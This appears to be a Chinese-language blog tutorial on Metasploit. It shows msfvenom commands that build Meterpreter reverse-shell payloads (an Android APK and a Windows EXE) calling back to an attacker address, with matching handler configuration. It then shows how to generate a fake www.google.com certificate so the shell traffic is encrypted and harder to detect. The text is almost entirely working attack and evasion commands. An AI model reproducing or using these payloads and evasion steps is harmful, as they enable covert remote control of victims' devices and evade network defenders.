发布于2022年11月4日3年前 在msf中生成shell,并上线运行时。都是通过http https tcp等协议传输。并没有加密,传输内容容易被检测和发现。如下,我们简单生成一个Android平台的shell。msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.123.33 LPORT=5555 R > bbs.apkmsf 配置信息如下:msfconsole use exploit/multi/handler set payload android/meterpreter/reverse_tcp set LHOST 192.168.123.33 set LPORT 5555 exploit很容易发现,我们的操作都是已明文的形式传输。加密msf流量创建证书openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \ -subj "/C=UK/ST=London/L=London/O=Development/CN=www.google.com" \ -keyout www.google.com.key \ -out www.google.com.crt && \ cat www.google.com.key www.google.com.crt > www.google.com.pem && \ rm -f www.google.com.key www.google.com.crt注意:代码输入格式参考图片。这样会在桌面生成一个www.bbskali.cn.pem的证书生成加密的shellmsfvenom -p windows/meterpreter/reverse_winhttps LHOST=192.168.123.33 LPORT=443 PayloadUUIDTracking=true HandlerSSLCert=www.google.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f exe -o bbskali.exe msf参数配置use exploit/multi/handler set payload windows/meterpreter/reverse_winhttps set lhost 192.168.123.33 set lport 443 set HandlerSSLCert www.google.com.pem #注意文件位置 set StagerVerifySSLCert true 运行shell后,我们再次抓包。发现流量全是密文了。 版权属于:逍遥子大表哥本文链接:https://blog.bbskali.cn/3126.html按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
创建帐户或登录后发表意见